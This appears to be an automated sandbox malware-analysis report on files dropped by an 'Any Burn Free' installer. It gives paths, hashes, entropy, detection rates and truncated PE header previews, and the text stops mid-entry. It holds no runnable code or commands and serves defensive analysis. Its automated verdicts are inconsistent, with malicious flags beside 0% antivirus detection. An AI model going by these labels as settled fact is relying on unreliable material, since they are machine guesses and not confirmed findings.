                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1007104
                                                                                                                                                                    Entropy (8bit):6.652666405660804
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:hEbJuxlv9Sawf3oEYsTXR7fxiGmUDZ/HJkAVJcJdKll6/QTjFZLFGPQRGnx54IC5:zlv9SlEJ8C/KjFnMMvvS4
                                                                                                                                                                    MD5:AE58662A16410481B477B78B8D47460B
                                                                                                                                                                    SHA1:FB8B1BA166913C18EB00F8CA53439D0F4EE54359
                                                                                                                                                                    SHA-256:A23D944BEA101C574875C13883088798CFDA712DE969DD14F529E870A0DE87DA
                                                                                                                                                                    SHA-512:93280D9AB366B3DFAE6E40E50984764FAB7BE6CA6BD2B5A24D1182D67F06F9CC50203CC3D01A4232593C0C1AD03DFAE56E119286D10B78D2E3D57B394BDA8778
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: GCJlGRkySF.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: ZJUNJ0W3mU.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: No3oDEBK8r.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 7abf5ad882fd72332b0b7fb530c8c6505852d4f7ea39edfe444218bdcd9c7f0e_dump.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: S23UhdW5DH.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: zbnq9rGNLi.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 5Yzloz244r.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.%S...........#.....J...Z...4..0........`....tl................................=......... ..........................;... .......`.......................p..Pp...........................P.......................$...............................text...$I.......J..................`.P`.data...H/...`...0...N..............@.`..rdata...............~..............@.`@.bss....P3............................`..edata...;.......<..................@.0@.idata....... ......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc..Pp...p...r..................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):3861569
                                                                                                                                                                    Entropy (8bit):5.804521023382024
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:C1TNqdZZZZZwrxe/b/7wSzPrujYuq5rk3gI:C1TNqJ/g
                                                                                                                                                                    MD5:EB428F0ECD8AD6907A62E6A0ACEAB53F
                                                                                                                                                                    SHA1:BB68C5525DD3837B7BC55C7C3DE3E00E89C9A38D
                                                                                                                                                                    SHA-256:FD3114590DBE505FB9DF500299FA8687060AC124852475C047D8FDDA49D0E20D
                                                                                                                                                                    SHA-512:5B6DD60ADFA5E362C212D79C3FC0EA8FEA88F7CE7A97611A3ECC16515C922D6C25D360709388C607F8F9C894857451E5D0CA7B09C3478CDEC1F2575A83C112C6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T....................l...........................t...................(.......Rich............PE..L...x..e.....................p......l.............@.......................... ;......................................................................................................................................................................text............................... ..`.rdata...1.......@..................@..@.data....P...0...0...0..............@....rsrc................`..............@..@.cab7........`(.A....0(.............`...........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5607950
                                                                                                                                                                    Entropy (8bit):6.633599482017416
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:8IS8iFbnejXFHVSh3z6+N5NeOYVxtAcPVBgkgrumYE1HpMTdy2/vlCyUIs:85hCFVSh3fN5NeOYVxLPVBcumzJMTdyx
                                                                                                                                                                    MD5:90593C11E9997DD4224CF278D5D66323
                                                                                                                                                                    SHA1:A89583C180A66FE2C8272F8CCD9876326CB29A1E
                                                                                                                                                                    SHA-256:82AA37DDE211EE28B366603CC9C74F0584ED46D57DF7C06447060BFCFF886A07
                                                                                                                                                                    SHA-512:93A8CDFD26B4684FBBCB6FF8487E77C4996BD48B58D38FB81FE7E243D1368342F2ED27A1219CB81A9CBED72FDD4061ACE091D95C326A4C3DFF84D59E9A45114A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........U........#...$..;...U..b$...........<..............................pz.......U...@... .......................x.......x..#....y.p.................... y.8E...........................gN.....................P.x..............................text...t.;.......;.................`.``.data...\.....<.......;.............@.`..rdata.......<.......<.............@.p@/4.......v....O..x....O.............@.0@.bss.....`$..0T.......................`..edata........x.......T.............@.0@.idata...#....x..$... T.............@.0..CRT....,.....x......DT.............@.0..tls..........y......FT.............@.0..rsrc...p.....y......HT.............@.0..reloc..8E... y..F...LT.............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2598926
                                                                                                                                                                    Entropy (8bit):6.2658394092546565
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:i5AIqzwPbYgLHcIE0DtbfgQPKaGSR+J8QVPqFk8QCMJn:i5AIqMPbYgLastLzPzGSR+J8QVPq9Q
                                                                                                                                                                    MD5:608FC55E2116CDCB88C3CF98B206017A
                                                                                                                                                                    SHA1:D73E406A963D160D164D686EA25611E8771ADEBF
                                                                                                                                                                    SHA-256:B39CF5A71B85B2CD233093EF7D55B39DB025DA78E080B38C070ACCF1436A2B4F
                                                                                                                                                                    SHA-512:8098EDD9C1E399925EC0A07BCD277F8634E72D156A75F9A5AF25809B0AEEA8C592CD45772E756F5546E87868756A28476EC53756EC87D79B242E9F16C4DF983F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........'........#...$......'...............................................(.......(...@... .......................&.......&..?...0'......................@'..............................I#.......................&..............................text...............................`.P`.data...<...........................@.`..rdata..x...........................@.`@/4............#.......#.............@.0@.bss....p.....&.......................`..edata........&.......&.............@.0@.idata...?....&..@....&.............@.0..CRT....,.....'.......&.............@.0..tls......... '.......&.............@.0..rsrc........0'.......&.............@.0..reloc.......@'.......&.............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):698382
                                                                                                                                                                    Entropy (8bit):6.476081490774289
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:Y8ncCX9jvWgnTMfFj/QhZmyF3yBRAotqlFRHEnWiGGLN:YscCNj3TGFTQhgyF3yBRAyqqV5
                                                                                                                                                                    MD5:7C4C4A4D5684E8AACDC6B118A601A7BB
                                                                                                                                                                    SHA1:64C8CC24339D73909916E303AB08A253DD49FE3F
                                                                                                                                                                    SHA-256:D20E213EF79F5F58CF6CA45812648E21612AF6B82F52EEEE044EA050AB32D75E
                                                                                                                                                                    SHA-512:DB34326A59C7E5E809DE1DA9C98D5464D753DD554E9C8DDDC32F164BFE9D637A5D5C6AE093905B8CA075B6801FD0D53E34E6400C7F9E1D553E33618A9BAADEEA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.......... ...........................................,.....}.....@... ......................@+..>....+.$.....+.h.....................+.l1..........................d-........................+.4............................text...............................`.P`.data...............................@.`..rdata.............................@.`@/4...........`.......B..............@.0@.bss....4. ..@........................`..edata...>...@+..@..................@.0@.idata..$.....+......^..............@.0..CRT....,.....+......n..............@.0..tls..........+......p..............@.0..rsrc...h.....+......r..............@.0..reloc..l1....+..2...v..............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-2MD1R.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):176200
                                                                                                                                                                    Entropy (8bit):6.647007817777345
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                                                                    MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                                                                    SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                                                                    SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                                                                    SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-2VNVT.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):715253
                                                                                                                                                                    Entropy (8bit):6.514659189868709
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:O/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRLh1K8xyFo:ukqZ1G7DMvrP537dzHsA6hcHGbH3Elh9
                                                                                                                                                                    MD5:50E93FA63C3EDA941B0FC757F7E2E197
                                                                                                                                                                    SHA1:177980A985C51C4645E757027A1C636516AD72E3
                                                                                                                                                                    SHA-256:84A9745A4DC38B42A30F226373088AC5C3E57BA5A83245831B74D33AF57CA27A
                                                                                                                                                                    SHA-512:61A42EC25FB0C4C08F6D1F899A299F999C2688A0DD0E98FC017E7E125CB73F7FB53CABF6C4BDE40357AA4A996DDB689C2D5646CDD1D4EEFCCF525E50C1195C9D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-5C03R.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):68552
                                                                                                                                                                    Entropy (8bit):6.1042544770100395
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                                                                    MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                                                                    SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                                                                    SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                                                                    SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-5HMK4.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):555894
                                                                                                                                                                    Entropy (8bit):3.4167624637949925
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:TnOHRuNruVRJ/RbM4YkuYFSwqFux5T8hac1eQ3RcMLQa9gKutRJhuusoAu3FsWVI:2z8wqux5TEacQmRcMcpfLnFQ
                                                                                                                                                                    MD5:77A96C1C8E72D12BE4DFA5600A67E0F4
                                                                                                                                                                    SHA1:F1A94189F7DA47DB26E332024C255AFAA085A654
                                                                                                                                                                    SHA-256:E6A08981AB88E25B892DB826D75EBE4C3A9EC932704F722B3E32E5D9C8CD359C
                                                                                                                                                                    SHA-512:267951B1CF2C745DA69265EEF7E921FF4A9F07C49000EB30D3C1793634C6AB61AB3A897E418A56C77C3F8F735AA2844FC6BF564DC2D88C9C0835A37A318AD52B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........v..$......#...#.:...r...............P.....k......................................@... .................................t............................................................Z.........................|............................text....8.......:..................`.P`.data...D....P.......>..............@.0..rdata..$....`.......@..............@.`@/4......L....`.......@..............@.0@.bss.........p........................0..edata...............L..............@.0@.idata..t............N..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc........... ...V..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-72Q7F.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2598926
                                                                                                                                                                    Entropy (8bit):6.2658394092546565
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:i5AIqzwPbYgLHcIE0DtbfgQPKaGSR+J8QVPqFk8QCMJn:i5AIqMPbYgLastLzPzGSR+J8QVPq9Q
                                                                                                                                                                    MD5:608FC55E2116CDCB88C3CF98B206017A
                                                                                                                                                                    SHA1:D73E406A963D160D164D686EA25611E8771ADEBF
                                                                                                                                                                    SHA-256:B39CF5A71B85B2CD233093EF7D55B39DB025DA78E080B38C070ACCF1436A2B4F
                                                                                                                                                                    SHA-512:8098EDD9C1E399925EC0A07BCD277F8634E72D156A75F9A5AF25809B0AEEA8C592CD45772E756F5546E87868756A28476EC53756EC87D79B242E9F16C4DF983F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........'........#...$......'...............................................(.......(...@... .......................&.......&..?...0'......................@'..............................I#.......................&..............................text...............................`.P`.data...<...........................@.`..rdata..x...........................@.`@/4............#.......#.............@.0@.bss....p.....&.......................`..edata........&.......&.............@.0@.idata...?....&..@....&.............@.0..CRT....,.....'.......&.............@.0..tls......... '.......&.............@.0..rsrc........0'.......&.............@.0..reloc.......@'.......&.............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-7FTBB.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):129038
                                                                                                                                                                    Entropy (8bit):6.508174898498455
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:2n7B3zAWc/gG6IsRc+JdTCXw4hXAMpI3pr:2n7B3zAWc/SmXfAMK
                                                                                                                                                                    MD5:3D8C24A40935FB27FC494FC6147E6EA8
                                                                                                                                                                    SHA1:C26B6949C34AADB8271E124CE08F511BE5033A04
                                                                                                                                                                    SHA-256:F83401305ACDA249D2A81CD8496E08643686FF1327EE4A495A1F3ABD77C7C3E6
                                                                                                                                                                    SHA-512:2EC272A4E770FB0B748ED3F3ED9E9A6983B2AB9B88D0C57C63E2248A1EF2B8D8A528EFAAD488CA377DBD05748DFA87DF086DDFA6B0DAD58571C47732320DC958
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.f................................................................@... ...................... .......0..T....`.......................p..x...................................................X1...............................text...$d.......f..................`.P`.data...P............j..............@.P..rdata..PE.......F...l..............@.`@/4.......'.......(..................@.0@.bss..................................0..edata....... ......................@.0@.idata..T....0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..rsrc........`......................@.0..reloc..x....p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-9633C.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):698382
                                                                                                                                                                    Entropy (8bit):6.476081490774289
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:Y8ncCX9jvWgnTMfFj/QhZmyF3yBRAotqlFRHEnWiGGLN:YscCNj3TGFTQhgyF3yBRAyqqV5
                                                                                                                                                                    MD5:7C4C4A4D5684E8AACDC6B118A601A7BB
                                                                                                                                                                    SHA1:64C8CC24339D73909916E303AB08A253DD49FE3F
                                                                                                                                                                    SHA-256:D20E213EF79F5F58CF6CA45812648E21612AF6B82F52EEEE044EA050AB32D75E
                                                                                                                                                                    SHA-512:DB34326A59C7E5E809DE1DA9C98D5464D753DD554E9C8DDDC32F164BFE9D637A5D5C6AE093905B8CA075B6801FD0D53E34E6400C7F9E1D553E33618A9BAADEEA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.......... ...........................................,.....}.....@... ......................@+..>....+.$.....+.h.....................+.l1..........................d-........................+.4............................text...............................`.P`.data...............................@.`..rdata.............................@.`@/4...........`.......B..............@.0@.bss....4. ..@........................`..edata...>...@+..@..................@.0@.idata..$.....+......^..............@.0..CRT....,.....+......n..............@.0..tls..........+......p..............@.0..rsrc...h.....+......r..............@.0..reloc..l1....+..2...v..............@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-BNUL3.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):127192
                                                                                                                                                                    Entropy (8bit):6.479927027421408
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:/fMTf09hjtHy4xaIqGpnuJY8KYA/hKjUR+YABqKBrnToIfqIOoIOGESvrTEgTWjx:XMA3Fa0sYDY6hKgRvwqOTBf4uGE+rYgE
                                                                                                                                                                    MD5:8B2A6E8419A8A4E7D3FD023D97455FB9
                                                                                                                                                                    SHA1:2547A1F94FB4F83B7C133A3E285EE11FAA155E84
                                                                                                                                                                    SHA-256:7087CDD1ACDFF6CD1B8D821388F430AF3888314B05A5821BB53E67034362F670
                                                                                                                                                                    SHA-512:44438F6DD4BECABC2CB3053E2C42877CBDB0F309FE272F67A94AD530CAF1C5E5D49BC394F7D21C4226A4F0EB6D8661C5C7113508EA2F446E0DBEA0D59554D4A4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........=......#...#.>...................P.....c.........................`......;.....@... .............................. ...............................P......................................................0!...............................text...d=.......>..................`.P`.data...L....P.......B..............@.0..rdata.. S...`...T...D..............@.`@/4.......2.......4..................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-CABAS.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1007104
                                                                                                                                                                    Entropy (8bit):6.652666405660804
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:hEbJuxlv9Sawf3oEYsTXR7fxiGmUDZ/HJkAVJcJdKll6/QTjFZLFGPQRGnx54IC5:zlv9SlEJ8C/KjFnMMvvS4
                                                                                                                                                                    MD5:AE58662A16410481B477B78B8D47460B
                                                                                                                                                                    SHA1:FB8B1BA166913C18EB00F8CA53439D0F4EE54359
                                                                                                                                                                    SHA-256:A23D944BEA101C574875C13883088798CFDA712DE969DD14F529E870A0DE87DA
                                                                                                                                                                    SHA-512:93280D9AB366B3DFAE6E40E50984764FAB7BE6CA6BD2B5A24D1182D67F06F9CC50203CC3D01A4232593C0C1AD03DFAE56E119286D10B78D2E3D57B394BDA8778
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.%S...........#.....J...Z...4..0........`....tl................................=......... ..........................;... .......`.......................p..Pp...........................P.......................$...............................text...$I.......J..................`.P`.data...H/...`...0...N..............@.`..rdata...............~..............@.`@.bss....P3............................`..edata...;.......<..................@.0@.idata....... ......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc..Pp...p...r..................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-E4NNM.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):105784
                                                                                                                                                                    Entropy (8bit):6.258144336244945
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                                                                    MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                                                                    SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                                                                    SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                                                                    SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-FJVPR.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):442
                                                                                                                                                                    Entropy (8bit):3.8280681998470794
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q+gZPiv77qlXS8lvlRFo1MonAUNycdlUlaT9SaG:Q+gZPo7GU0vlRq1pnAUNnd+gTAaG
                                                                                                                                                                    MD5:09204E71E9F3B624E909FB20DEFE6EF5
                                                                                                                                                                    SHA1:2374900EBB8D9BB7127217DAE828A949B8E7938B
                                                                                                                                                                    SHA-256:D0755838EFEF3A423FFF51C91B2AEC497EB6C1A2A845534D6918C433E1F95267
                                                                                                                                                                    SHA-512:7B6FE24B112EED282D5795F0D2D122CC71539823609F1F3A7A5B3CAFEC8C86F00B310454B0CB607F881DBA99E7F2E55DD6EEDC31A3CC3D1F2B10FE43A923DE8F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..[.L.A.N.G.U.A.G.E.].....n.a.m.e.1.=.E.n.g.l.i.s.h.....n.a.m.e.2.=.E.s.p.a...o.l.....n.a.m.e.3.=.D.e.u.t.s.c.h.....n.a.m.e.4.=.F.r.a.n...a.i.s.....n.a.m.e.5.=.I.t.a.l.i.a.n.o.....n.a.m.e.6.=..e,g......n.a.m.e.7.=.M.a.g.y.a.r.....n.a.m.e.8.=.T...r.k.....n.a.m.e.9.=.'.D.9.1.(.J.).....n.a.m.e.1.0.=.R.o.m...n.......n.a.m.e.1.1.=.A~.-N.e....f.i.l.e.=.e.n.g.l.i.s.h...i.n.i.....[.P.A.T.H.].....n.a.m.e.=.D.:.\.....[.T.I.M.E.S.].....t.i.m.e.=.0.

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\is-I193V.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
